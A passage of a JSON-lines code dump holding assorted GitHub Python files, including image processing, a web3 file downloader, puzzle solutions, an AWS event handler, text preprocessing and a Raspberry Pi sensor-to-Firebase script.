left\")\n plt.ylim([0, 1])\n\n ax1 = plt.twinx()\n ax1.plot(l, entropy_list, 'r', marker='.', label='entropy')\n ax1.set_ylabel(\"entropy\")\n ax1.set_ylim([0, 1])\n plt.legend(loc=\"upper right\")\n\n for i, en in zip(l, entropy_list):\n plt.text(i, en, '%.3f'%en, ha='center', va='bottom', fontsize=12)\n\n plt.xticks(l, [\"Jiang's\", \"Bai's\", \"ours(cos)\", \"ours(js)\", \"ours(bhattacharyya)\"])\n plt.show()\n","repo_name":"OneDrop29/Improved-Label-Fusion-Method-Based-on-D-S-Evidence-Theory-Using-Subjective-and-Objective-Weights","sub_path":"fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":14587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73525861889","text":"#!/usr/bin/python3\n\n# Importing Modules\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.misc import imread, imsave\n\n# Authorship Information\n__author__ = \"Harsh Bhate\"\n__email__ = \"bhate@gatech.edu\"\n\ndef load_image(file_path=\"inputPS0Q2.png\"):\n \"\"\"Load image to a matrix\n Parameters\n ----------\n file_path : str (optional)\n The file path to load image\n Returns\n -------\n image : np.array\n A np.array matrix\n \"\"\"\n return imread(file_path)\n\ndef switch_channels(image):\n \"\"\"Switch the Red and Green channels\n Parameters\n ----------\n image : np.array\n A np.array matrix\n Returns\n -------\n swap_image : np.array\n A swapped np.array matrix\n \"\"\"\n return np.dstack([image[:,:,1], image[:,:,0], image[:,:,2]])\n\ndef save_image(image, file_name):\n \"\"\"Saves Image to file\n Parameters\n ----------\n image : np.array\n The image matrix\n file_name : str\n Path to save the file\n \"\"\"\n imsave(file_name, image)\n\ndef rgb2gray(image):\n \"\"\"Converts RGB to grayscale\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n gray_image : np.array\n The grayscale image\n \"\"\"\n return np.uint8(np.dot(image[..., :3], [0.2989, 0.5870, 0.1140]))\n\ndef negative_image(image):\n \"\"\"Creates an image negative\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n neg_image : np.array\n The negative image\n \"\"\"\n max_pixel = np.max(image)\n return np.uint8(max_pixel - image)\n\ndef mirror_image(image):\n \"\"\"Creates mirror image\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n flip_image : np.array\n The mirror image\n \"\"\"\n return image[:, ::-1]\n\ndef avg_image(gray_image, mirror_image):\n \"\"\"Averages image and mirror_image\n Parameters\n ----------\n image : np.array\n The image matrix\n mirror_image : np.array\n The mirror image\n Returns\n -------\n avg_img : np.array\n The average image\n \"\"\"\n gray_image = gray_image/255.0\n mirror_image = mirror_image/255.0\n return np.uint(((gray_image+mirror_image)/2.0)*255.0)\n\ndef generate_noise(size):\n \"\"\"Generates noise\n Parameters\n ----------\n size : tuple(int)\n The size of noise\n Returns\n -------\n noice : np.array\n The noise matrix\n \"\"\"\n return np.random.rand(size[0], size[1])\n\ndef add_noise(image, noise):\n \"\"\"Adds noise to image\n Parameters\n ----------\n image : np.array\n The input image\n noise : np.array\n The noise matrix\n Returns\n -------\n noised_image : np.array\n The noised_image\n \"\"\"\n normalized_image = image/255.0\n return np.uint8((normalized_image + noise)/2.0 * 255.0)\n\nif __name__==\"__main__\":\n # Loading Image\n img = load_image()\n # Problem 1\n swapped_img = switch_channels(img)\n save_image(swapped_img, \"swapImgPS0Q2.png\")\n # Problem 2\n gray_img = rgb2gray(img)\n save_image(gray_img, \"grayImgPS0Q2.png\")\n # Problem 3\n # Subproblem (a)\n neg_img = negative_image(gray_img)\n save_image(neg_img, \"negativeImgPS0Q2.png\")\n # Subproblem (b)\n flip_img = mirror_image(gray_img)\n save_image(flip_img, \"mirrorImgPS0Q2.png\")\n # Subproblem (c)\n avg_img = avg_image(gray_img, flip_img)\n save_image(avg_img, \"avgImgPS0Q2.png\")\n # Subproblem (d)\n noise = generate_noise(gray_img.shape)\n noised_img = add_noise(gray_img, noise)\n save_image(noised_img, \"addNoiseImgPS0Q2.png\")\n # Testing\n # Plotting \n # Settings for LaTeX rendering\n # Please comment if your system does not have a native \n # LaTeX rendering software\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.rc('xtick', labelsize=10) \n plt.rc('ytick', labelsize=10) \n font = {'family' : 'serif', 'size' : 12}\n plt.rc('font', **font)\n # Plots\n fig, axs = plt.subplots(3,2)\n # Subplot 1\n axs[0,0].imshow(swapped_img)\n axs[0,0].set_title(r'Image with Swapped Channels')\n # Subplot 2\n axs[0,1].imshow(gray_img, cmap=\"gray\")\n axs[0,1].set_title(r'Gray Scale Image')\n # # Subplot 3\n axs[1,0].imshow(neg_img, cmap=\"gray\")\n axs[1,0].set_title(r'Negative Image') \n # # Subplot 4\n axs[1,1].imshow(flip_img, cmap=\"gray\")\n axs[1,1].set_title(r'Mirror Image') \n # Subplot 5\n axs[2,0].imshow(avg_img, cmap=\"gray\")\n axs[2,0].set_title(r'Image averaged with its mirror') \n # Subplot 6\n axs[2,1].imshow(noised_img, cmap=\"gray\")\n axs[2,1].set_title(r'Noised Image') \n \n # Labels\n fig.suptitle(r'\\textbf{Image Transformations}')\n # Display plot\n plt.show()\n","repo_name":"bhateharsh/computer_vision","sub_path":"ps_0/PS0Q2.py","file_name":"PS0Q2.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"1809082522","text":"from web3 import Web3\nfrom web3.exceptions import ContractLogicError\n\n# how tf does this fix\nfrom web3.middleware import geth_poa_middleware\n\nimport os, sys\nimport hashlib\n\nPRIVATE_KEY = os.environ.get('PRIVATE_KEY')\nPERSONAL_ADDRESS = os.environ.get('ADDRESS')\nRPC_URL = os.environ.get('RPC_URL')\nCHAIN_ID = int(os.environ.get('CHAIN_ID'))\nCHAIN_SCAN_URL = os.environ.get('CHAIN_SCAN_URL')\nCONTRACT_ADDRESS = os.environ.get('CONTRACT_ADDRESS')\nCONTRACT_ABI = os.environ.get('CONTRACT_ABI')\n\nw3 = Web3(Web3.HTTPProvider(RPC_URL))\nw3.middleware_onion.inject(geth_poa_middleware, layer=0)\n\ncontractAddress = Web3.toChecksumAddress(CONTRACT_ADDRESS)\ncontractAbi = CONTRACT_ABI\n\ncontract = w3.eth.contract(address=contractAddress, abi=contractAbi)\n\nmyAddress = Web3.toChecksumAddress(PERSONAL_ADDRESS)\nmyKey = PRIVATE_KEY\n\nnonce = w3.eth.getTransactionCount(myAddress)\ncount = 0\n\nfileName = sys.argv[1] if len(sys.argv) > 1 else \"songLarge\"\n\ntransaction = contract.functions.getFileInfo(fileName).call()\n\nfileName = transaction[0]\nfileExtension = transaction[1]\nfileArrayLength = transaction[2]\nfileFinalPartLength = transaction[3]\n\nif not os.path.isdir('outputs'):\n os.makedirs('outputs')\n\ndownloadedFileParts = []\n\ndef downloadFileParts(_fileName, _fileArrayIndex, _fileArrayBegin, _fileArrayEnd):\n print('Downloading File Part:', _fileArrayIndex, 'from', _fileArrayBegin, 'to', _fileArrayEnd)\n for i in range(0, _fileArrayEnd - _fileArrayBegin, 500):\n\n print('Processing: ', i + _fileArrayBegin, 'to', _fileArrayBegin + i+500)\n\n endIndex = i + 500 if _fileArrayBegin + i + 500 < _fileArrayEnd else _fileArrayEnd - _fileArrayBegin\n\n print('Indexing: ', i, 'to', endIndex)\n\n transaction = contract.functions.getFileArray(fileName, _fileArrayIndex, i, endIndex).call()\n\n downloadedFileParts.append(b''.join(transaction))\n\nif fileArrayLength > 1:\n for i in range(0, fileArrayLength - 1):\n downloadFileParts(fileName, i, i * 10000, (i + 1) * 10000)\n downloadFileParts(fileName, fileArrayLength - 1, (fileArrayLength - 1) * 10000, (fileArrayLength - 1) * 10000 + fileFinalPartLength)\nelse:\n downloadFileParts(fileName, 0, 0, fileFinalPartLength - 1)\n\nwith open('outputs/{}.{}'.format(fileName, fileExtension), 'wb') as f:\n for part in downloadedFileParts:\n f.write(part)","repo_name":"johnmiddleton12/storage-dapp","sub_path":"local-scripts/downloadFile.py","file_name":"downloadFile.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11167425650","text":"puzzleinput = r\"\"\"L.LL.LL.LL\nLLLLLLL.LL\nL.L.L..L..\nLLLL.LL.LL\nL.LL.LL.LL\nL.LLLLL.LL\n..L.L.....\nLLLLLLLLLL\nL.LLLLLL.L\nL.LLLLL.LL\"\"\"\n\n\ndef occupied_dir(grid,r,c,dr,dc) :\n r += dr\n c += dc\n while 0 <= r < len(grid) and 0 <= c < len(grid[0]) :\n if grid[r][c] == \"#\" :\n return True\n if grid[r][c] == \"L\" :\n return False\n r += dr\n c += dc\n return False\n \n\ndef num_occupied(grid,r,c) :\n count = 0\n for dr,dc in [(-1,-1),(-1,0),(-1,+1),(0,-1),(0,+1),(+1,-1),(+1,0),(+1,+1)] :\n if occupied_dir(grid,r,c,dr,dc) :\n count += 1\n return count\n\ngrid = [[x for x in line] for line in (puzzleinput.splitlines())]\ndef iterate() :\n global grid\n newgrid = [[\".\" for x in range(len(grid[0]))] for x in range(len(grid))]\n changed = False\n for r in range(len(grid)) :\n for c in range(len(grid[0])) :\n if grid[r][c] == \"L\" :\n if num_occupied(grid,r,c) == 0:\n changed = True\n newgrid[r][c] = \"#\"\n else :\n newgrid[r][c] = \"L\"\n if grid[r][c] == \"#\" :\n if num_occupied(grid,r,c) >= 5:\n changed = True\n newgrid[r][c] = \"L\"\n else :\n newgrid[r][c] = \"#\"\n grid = newgrid\n return changed\nwhile iterate() :\n pass\ncount = 0\nfor row in grid :\n for seat in row :\n if seat == \"#\" :\n count += 1\nprint(count)\n","repo_name":"chambost/competitions","sub_path":"adventofcode.com/2020/day11/day11b_AoC_2020.py","file_name":"day11b_AoC_2020.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2971261966","text":"#!/usr/bin/python\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtGui import QApplication\nfrom source.mainwindow import MainWindow\nfrom source.choosefootprint import ChooseFootprintDialog\n\nimport ConfigParser\n\ndef main():\n from source import dbfunctions\n import MySQLdb\n import sys\n \n app = QApplication(sys.argv)\n #app.setStyle(\"cleanlooks\")\n #plastique\n #cde\n #motif\n #sgi\n #windows\n #cleanlooks\n #mac\n \n conf = ConfigParser.ConfigParser()\n conf.read(\"connections.conf\")\n \n db = MySQLdb.connect(host=\"localhost\", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))\n db.autocommit(True)\n \n cursor = db.cursor()\n cursor.execute(\"select footprint_name from footprints order by footprint_name\")\n \n footprints_list = [ \"\" ]\n for row in cursor.fetchall():\n footprints_list.append(row[0])\n \n cursor.close()\n \n cftwnd = ChooseFootprintDialog()\n cftwnd.setFootprints(footprints_list)\n if cftwnd.exec_():\n footprintName, doWork, options = cftwnd.getResults()\n \n footprintID = dbfunctions.createFootprint(db, footprintName)\n \n wnd = MainWindow()\n wnd.setWindowTitle(\"autodane : {0}\".format(footprintName))\n wnd.setFootprintInfo(db, footprintID, footprintName, doWork, options)\n wnd.show()\n wnd.start()\n\n logoPixmap = QtGui.QPixmap(QString.fromUtf8('images/logo.png'))\n logoScaledPixmap = logoPixmap.scaled(wnd.lblSensePostLogo.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblSensePostLogo.setPixmap(logoScaledPixmap)\n \n emailPixmap = QtGui.QPixmap(QString.fromUtf8('images/email.png'))\n emailScaledPixmap = emailPixmap.scaled(wnd.lblEmailIcon.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblEmailIcon.setPixmap(emailScaledPixmap)\n \n emailScaledPixmap = emailPixmap.scaled(wnd.lblEmailIcon2.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblEmailIcon2.setPixmap(emailScaledPixmap)\n \n skypePixmap = QtGui.QPixmap(QString.fromUtf8('images/skype.png'))\n skypeScaledPixmap = skypePixmap.scaled(wnd.lblSkypeLogo.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblSkypeLogo.setPixmap(skypeScaledPixmap)\n else:\n quit()\n\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()\n","repo_name":"danegoodwin/autodane","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"8634699191","text":"\"\"\"\nGiven a real number n, find the square root of n. For example, given n = 9, return 3.\n\"\"\"\n# Assuming we have to return an integer value.\ndef mySqrt(x):\n if x == 0:\n return 0\n left, right = 1, x\n while left <= right:\n mid = (left + right) // 2\n squared = mid * mid\n if squared == x:\n return mid\n elif squared > x:\n right = mid - 1\n else:\n left = mid + 1\n return right","repo_name":"anantkaushik/dailycodingproblem","sub_path":"Others/Problem#467.py","file_name":"Problem#467.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"43"} +{"seq_id":"16917115160","text":"import sys\nn, t = map(int, input().split())\nA = [int(x) for x in input().split()]\ndict = {}\nfor i in A:\n if i in dict:\n dict[i] += 1\n else:\n dict[i] = 1\nA.sort()\n\nif t == 1:\n for k, v in dict.items():\n if (7777-k) in dict:\n print(\"Yes\")\n sys.exit(0)\n print(\"No\")\n sys.exit(0)\n\nif t == 2:\n for v in dict.values():\n if v > 1:\n print(\"Contains duplicate\")\n sys.exit(0)\n print(\"Unique\")\n sys.exit(0)\n\nif t == 3:\n lots = []\n for k, v in dict.items():\n if v > n/2:\n lots.append(k)\n if len(lots) > 0:\n for x in lots:\n print(x, end=' ')\n print()\n else:\n print(-1)\n sys.exit(0)\n\nif t == 4:\n median = []\n if n % 2 != 0:\n median.append(A[n//2])\n else:\n median.append(A[n//2-1])\n median.append(A[n//2])\n if len(median) > 0:\n for x in median:\n print(x, end=' ')\n print()\n sys.exit(0)\n\nif t == 5:\n inrange = []\n for k in A:\n if k >= 100 and k <= 999:\n inrange.append(k)\n if len(inrange) > 0:\n for x in inrange:\n print(x, end=' ')\n print()\n","repo_name":"iamvickynguyen/Kattis-Solutions","sub_path":"basic_programming2.py","file_name":"basic_programming2.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"74119307648","text":"# For each loop\n# Same thing as\n# for i in range(0, 5):\nfor i in range(5):\n\tprint(i)\n\n# Reverse for each loop \nfor i in reversed(range(5)):\n\tprint(i)\n###################################################\n\n# Idiomatic examples to traverse lists\nnumbers = ['zero', 'one', 'two', 'three', 'four']\n\n# Traverse in order\nfor num in numbers:\n\tprint(num)\n\t\n# Traverse in reverse order\nfor num in reversed(numbers):\n\tprint(num)\n\t\n# Traverse in order with indices\nfor i, num in enumerate(numbers):\n\tprint(f'{i}->{num}')\n\t\n# Traverse n lists in order in parallel up to the len of the shortest list\ncolors = ['red', 'green', 'blue']\nfor num, color in zip(numbers, colors):\n\tprint(f'{num}->{color}')\n\t\n# Traverse in sorted order\nfor num in sorted(numbers):\n\tprint(num)\n\n# Traverse in key sorted order\nfor num in sorted(numbers, key=len):\n\tprint(f'{num} (len={len(num)})')\n###################################################\n\n# For else\nres = None\nfor i in range(5):\n\tif (i == 5):\n\t\tres = i\n\t\tbreak\nelse: # No break\n\tres = -1\n\t\nprint(res)\n###################################################\n\n# Generator objects\nls = (i**2 for i in range(11))\nfor i in ls:\n\tprint(i)\n\n","repo_name":"kvntng17/pythonic_idioms","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41960393646","text":"import json\nfrom cloudwatch_events.event import Event\n\nclass RDSDBInstanceEvent(Event):\n def __init__(self, event):\n self.region = event.get('region')\n self.resources = event.get('resources')\n self.time = event.get('time')\n self.event_categories = event.get('detail').get('EventCategories')\n self.message = event.get('detail').get('Message')\n self.source = event.get('detail').get('SourceIdentifier')\n\n def sensu_result(self):\n status_map = {\n 'failover': 2,\n }\n\n sensu_check = {\n 'name': 'rds_{}'.format(self.source),\n 'source': 'rds.aws',\n 'status': '{}'.format(status_map.get(self.event_categories[0]),1),\n 'output': 'RDS event:{} from {} at {}, manually resolve alert when recovered.'.format(self.event_categories[0], self.soruce, self.time)\n }\n\n return sensu_check\n\n class Factory:\n @staticmethod\n def create(json): return RDSDBInstanceEvent(json)\n\n","repo_name":"af6140/lambba-cloudwatch_to_sensu_result","sub_path":"cloudwatch_events/rds/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15738443117","text":"from __future__ import division\n\ncommoncharacter=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','!','$','%','&','(',')','\\'','\\\"','.',',','?','+','=','-','*','/','0','1','2','3','4','5','6','7','8','9',':',';','#','{','}','[',']','<','>','|','_','\\\\','^','@','~']\nspecial=['`']\nspecialcharacter={\"\\xef\\xbc\\xa1\" : 'A',\n \"\\xef\\xbc\\xa2\" : 'B',\n \"\\xef\\xbc\\xa3\" : 'C',\n \"\\xef\\xbc\\xa4\" : 'D',\n \"\\xef\\xbc\\xa5\" : 'E',\n \"\\xef\\xbc\\xa6\" : 'F',\n \"\\xef\\xbc\\xa7\" : 'G',\n \"\\xef\\xbc\\xa8\" : 'H',\n \"\\xef\\xbc\\xa9\" : 'I',\n \"\\xef\\xbc\\xaa\" : 'J',\n \"\\xef\\xbc\\xab\" : 'K',\n \"\\xef\\xbc\\xac\" : 'L',\n \"\\xef\\xbc\\xad\" : 'M',\n \"\\xef\\xbc\\xae\" : 'N',\n \"\\xef\\xbc\\xaf\" : 'O',\n \"\\xef\\xbc\\xb0\" : 'P',\n \"\\xef\\xbc\\xb1\" : 'Q',\n \"\\xef\\xbc\\xb2\" : 'R',\n \"\\xef\\xbc\\xb3\" : 'S',\n \"\\xef\\xbc\\xb4\" : 'T',\n \"\\xef\\xbc\\xb5\" : 'U',\n \"\\xef\\xbc\\xb6\" : 'V',\n \"\\xef\\xbc\\xb7\" : 'W',\n \"\\xef\\xbc\\xb8\" : 'X',\n \"\\xef\\xbc\\xb9\" : 'Y',\n \"\\xef\\xbc\\xba\" : 'Z',\n \"\\xef\\xbd\\x81\" : 'a',\n \"\\xef\\xbd\\x82\" : 'b',\n \"\\xef\\xbd\\x83\" : 'c',\n \"\\xef\\xbd\\x84\" : 'd',\n \"\\xef\\xbd\\x85\" : 'e',\n \"\\xef\\xbd\\x86\" : 'f',\n \"\\xef\\xbd\\x87\" : 'g',\n \"\\xef\\xbd\\x88\" : 'h',\n \"\\xef\\xbd\\x89\" : 'i',\n \"\\xef\\xbd\\x8a\" : 'j',\n \"\\xef\\xbd\\x8b\" : 'k',\n \"\\xef\\xbd\\x8c\" : 'l',\n \"\\xef\\xbd\\x8d\" : 'm',\n \"\\xef\\xbd\\x8e\" : 'n',\n \"\\xef\\xbd\\x8f\" : 'o',\n \"\\xef\\xbd\\x90\" : 'p',\n \"\\xef\\xbd\\x91\" : 'q',\n \"\\xef\\xbd\\x92\" : 'r',\n \"\\xef\\xbd\\x93\" : 's',\n \"\\xef\\xbd\\x94\" : 't',\n \"\\xef\\xbd\\x95\" : 'u',\n \"\\xef\\xbd\\x96\" : 'v',\n \"\\xef\\xbd\\x97\" : 'w',\n \"\\xef\\xbd\\x98\" : 'x',\n \"\\xef\\xbd\\x99\" : 'y',\n \"\\xef\\xbd\\x9a\" : 'z'}\nspecialsymbol={\"\\xef\\xb9\\x9e\" : ')',\n \"\\xef\\xb9\\x9d\" : '(',\n \"\\xef\\xbd\\x9d\" : '}',\n \"\\xef\\xb9\\x90\" : ',',\n \"\\xef\\xbd\\x80\" : '\\'',\n \"\\xef\\xb9\\xa5\" : '>',\n \"\\xef\\xbc\\x9c\" : '<',\n \"\\xef\\xbc\\x9d\" : '=',\n \"\\xef\\xbc\\x9e\" : '>',\n \"\\xef\\xbc\\x82\" : '\\\"',\n \"\\xef\\xbc\\x84\" : '$',\n \"\\xef\\xbc\\x86\" : '&',\n \"\\xef\\xbc\\x87\" : '\\'',\n \"\\xef\\xbc\\x8a\" : '*',\n \"\\xef\\xbc\\x8b\" : '+',\n \"\\xef\\xbc\\x8d\" : '-',\n \"\\xef\\xbc\\x8f\" : '/',\n \"\\xef\\xbc\\xbb\" : '[',\n \"\\xef\\xbc\\xbc\" : '\\\\',\n \"\\xef\\xbc\\xbd\" : ']',\n \"\\xef\\xbc\\xbe\" : '^',\n \"\\xef\\xbc\\xbf\" : '_',\n \"\\xef\\xbc\\xa0\" : '@',\n \"\\xef\\xbc\\x83\" : '#'}\nspecialunit3=['\\xef\\xbf\\xa5','\\xef\\xbf\\xa1','\\xef\\xbf\\xa0']\nspecialunit2=[]#'\\xc2\\xb0'\n\ndef processline(line):\n line=line.split(' ')\n if 'http' in line and ':' in line:\n return \"\",True\n skip=False\n for j,word in enumerate(line):\n word=word.replace('\\\\/','/')\n line[j]=word\n for i in range(len(word)):\n if not word[i] in commoncharacter:\n if word[i] in special:\n re=line[j]\n re=re[0:i]+'\\''+re[i+1:]\n line[j]=re\n elif len(word)>=2+i:\n if word[i:i+2] in specialunit2:\n pass\n elif len(word)>=3+i:\n if word[i:i+3] in specialcharacter:\n re=line[j]\n re=re[0:i]+specialcharacter[word[i:i+3]]+re[i+3:]\n line[j]=re\n #elif word[i:i+3] in specialsymbol:\n # re=line[j]\n # re=re[0:i]+specialsymbol[word[i:i+3]]+re[i+3:]\n # line[j]=re\n # print l2\n elif word[i:i+3] in specialunit3:\n pass\n else:\n skip=True\n else:\n skip=True\n else:\n pass\n return line,skip\n\ndef preprocess(src_dir,trg_dir,out_dir,out_file_name,abandon_same_corpus=True):\n s=set()\n with open(src_dir,'r') as f:\n with open(trg_dir,'r') as f1:\n with open(out_dir+out_file_name+'.src.p','w') as f2:\n with open(out_dir+out_file_name+'.trg.p','w') as f3:\n with open(out_dir+out_file_name+'.src.q','w') as f4:\n with open(out_dir+out_file_name+'.trg.q','w') as f5:\n for l1,l2 in zip(f.readlines(),f1.readlines()):\n l1=l1[:-1]\n l2=l2[:-1]\n if abandon_same_corpus and l1==l2:\n continue\n\n line1,skip=processline(l1)\n if skip:\n f4.write(l1+'\\n')\n f5.write(l2+'\\n')\n continue\n \n line2,skip=processline(l2)\n if skip:\n f4.write(l1+'\\n')\n f5.write(l2+'\\n')\n continue\n \n line1=' '.join(line1)\n line2=' '.join(line2)\n if line1+line2 in s:\n continue\n else:\n s.add(line1+line2)\n\n f2.write(line1+'\\n')\n f3.write(line2+'\\n')\n\nimport sys\nif not len(sys.argv)==6:\n exit()\nb=False\nif sys.argv[5]=='True':\n b=True\npreprocess(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],b)\n","repo_name":"blcuicall/gec-data-synthesis","sub_path":"data/scripts/preprocess_traindata.py","file_name":"preprocess_traindata.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"11611579625","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\r\n# SPDX-License-Identifier: MIT\r\n\r\nimport pyrebase\r\nimport time\r\nfrom time import sleep\r\nimport board\r\nimport adafruit_dht\r\n#!/usr/bin/env python3\r\nimport RPi.GPIO as GPIO # import GPIO\r\nfrom hx711 import HX711 # import the class HX711\r\n\r\n\r\n\r\n\r\n# Initial the dht device, with data pin connected to:\r\ndhtDevice = adafruit_dht.DHT22(board.D4)\r\n\r\n# you can pass DHT22 use_pulseio=False if you wouldn't like to use pulseio.\r\n# This may be necessary on a Linux single board computer like the Raspberry Pi,\r\n# but it will not work in CircuitPython.\r\n# dhtDevice = adafruit_dht.DHT22(board.D18, use_pulseio=False)\r\n\r\n\r\n \r\n \r\n\r\nconfig = {\r\n # You can get all these info from the firebase website. It's associated with your account.\r\n \"apiKey\": \"apiKey\",\r\n \"authDomain\": \"authDomain.firebaseapp.com\",\r\n \"databaseURL\": \"databaseURL.firebaseio.com/\",\r\n \"storageBucket\": \"storageBucke.appspot.com\"\r\n}\r\nuser = None\r\n\r\ndef GetAuthorized(firebase):\r\n global user\r\n auth = firebase.auth() # Get a reference to the auth service\r\n # authenticate a user\r\n try:\r\n user = auth.sign_in_with_email_and_password(\"username\",\r\n \"password\") # username and password of your account for database\r\n print(user) # display the user information, if successful\r\n except:\r\n print(\"Not authorized\")\r\n user = None\r\n\r\n# The function to initialize the database.\r\n# ====================================================================================================\r\ndef dbInitialization():\r\n firebase = pyrebase.initialize_app(config) # has to initialize the database\r\n GetAuthorized(firebase) # get authorized to operate on the database.\r\n return firebase\r\n\r\n# The function to get the data from firebase database.\r\n# ====================================================================================================\r\ndef GetDatafromFirebase(db):\r\n results = db.child(\"data\").get(user[\"idToken\"]).val(); # needs the authorization to get the data.\r\n print(\"These are the records from the Database\")\r\n print(results)\r\n return;\r\n\r\n# The function to send the data to firebase database.\r\n# ====================================================================================================\r\ndef sendtoFirebase(db, sensordata):\r\n result = db.child(\"data\").push(sensordata, user[\"idToken\"]) # needs the authorization to save the data\r\n print(result)\r\n return;\r\n\r\n\r\n# The function to send the data to firebase database's user authorized section.\r\n# Each user has a separate record tree, and it is only accessible for the authorized users.\r\n# ====================================================================================================\r\ndef sendtoUserFirebase(db, sensordata):\r\n userid = user[\"localId\"] # this will guarantee the data is stored into the user directory.\r\n result = db.child(\"userdata\").child(userid).push(sensordata, user[\"idToken\"]) # needs the authorization to save the data\r\n print(result)\r\n return;\r\n\r\n# The function to set up the record structure to be written to the database.\r\n# ====================================================================================================\r\ndef setupData(temp, humidity, timestamp, weight):\r\n sensor = {\"temperature\": temp,\r\n \"humidity\": humidity,\r\n \"weight\": weight,\r\n \"timestamp\": timestamp} # always post the timestamps in epoch with the data to track the timing.\r\n # Store the data as the dictionary format in python # refer to here:\r\n # https://www.w3schools.com/python/python_dictionaries.asp\r\n return sensor\r\n\r\n# The function to retrieve data on the relay board from the database.\r\n# ====================================================================================================\r\ndef getRelayData(db):\r\n relayResult = db.child(\"Relay\").child(\"state\").get(user[\"idToken\"]).val(); #get state of gpio pin\r\n return relayResult;\r\n \r\n# The function to set the state of the relay depending on the data from the database.\r\n# ==================================================================================================== \r\ndef relay(db):\r\n \r\n pinOut = getRelayData(db)\r\n \r\n relayS = str(board.D26)\r\n i = int(relayS)\r\n\r\n #set mode and state to 'low'\r\n\r\n GPIO.setup(i, GPIO.OUT)\r\n GPIO.output(i, GPIO.HIGH)\r\n\r\n # time to sleep between operations in the main loop\r\n\r\n SleepTimeL = 10\r\n\r\n # main loop\r\n\r\n if pinOut == 1: \r\n GPIO.output(26, GPIO.HIGH)\r\n print (\"Relay OFF\")\r\n if pinOut == 0: \r\n GPIO.output(26, GPIO.LOW)\r\n print (\"Relay ON\")\r\n return;\r\n \r\n \r\n# The function to initialize the load cell object.\r\n# ==================================================================================================== \r\ndef loadIt():\r\n# GPIO.setmode(GPIO.BCM) # set GPIO pin mode to BCM numbering\r\n # Create an object hx which represents your real hx711 chip\r\n # Required input parameters are only 'dout_pin' and 'pd_sck_pin'\r\n doutS = str(board.D14)\r\n pdS = str(board.D15)\r\n dout = int(doutS)\r\n pd = int(pdS)\r\n hx = HX711(dout_pin=dout, pd_sck_pin=pd)\r\n # measure tare and save the value as offset for current channel\r\n # and gain selected. That means channel A and gain 128\r\n\r\n err = hx.zero()\r\n print(err)\r\n # check if successful\r\n if err:\r\n raise ValueError('Tare is unsuccessful.')\r\n\r\n reading = hx.get_raw_data_mean()\r\n if reading: # always check if you get correct value or only False\r\n # now the value is close to 0\r\n print('Data subtracted by offset but still not converted to units:',\r\n reading)\r\n else:\r\n print('invalid data', reading)\r\n \r\n return hx\r\n\r\n# The Main control function.\r\n# ====================================================================================================\r\ndef main():\r\n try:\r\n count = 0\r\n firebase = dbInitialization()\r\n hx = loadIt()\r\n \r\n ratio = 299.939\r\n hx.set_scale_ratio(ratio) # set ratio for current channel\r\n print('Ratio is set.', ratio)\r\n while True:\r\n try:\r\n \r\n relay(firebase.database())\r\n # Print the values to the serial port\r\n temperature_c = dhtDevice.temperature\r\n temperature_f = temperature_c * (9 / 5) + 32\r\n humidity = dhtDevice.humidity\r\n \r\n \r\n print('Current weight on the scale in grams is: ')\r\n \r\n weight = hx.get_weight_mean()\r\n hx.reset()\r\n print(weight)\r\n \r\n \r\n load = weight\r\n print(\r\n \"Temp: {:.1f} F / {:.1f} C Humidity: {}% Weight: {} \".format(\r\n temperature_f, temperature_c, humidity, load\r\n )\r\n )\r\n \r\n temp = str(temperature_c) + \" C\"\r\n humid = str(humidity) + \"%\"\r\n percent = (load / 1800) * 100\r\n x = round(percent, 2) \r\n loadPercent = str(x) + \"%\"\r\n print(loadPercent)\r\n sensordata = setupData(temp,\r\n humid,\r\n int(time.time()),\r\n loadPercent)\r\n sendtoFirebase(firebase.database(), sensordata) # save to the public access data tree\r\n sendtoUserFirebase(firebase.database(), sensordata) # save to the user specific userdata tree \r\n count += 1\r\n sleep(3)\r\n print (\"Analog Signal Generated from D/A Output\")\r\n if (count 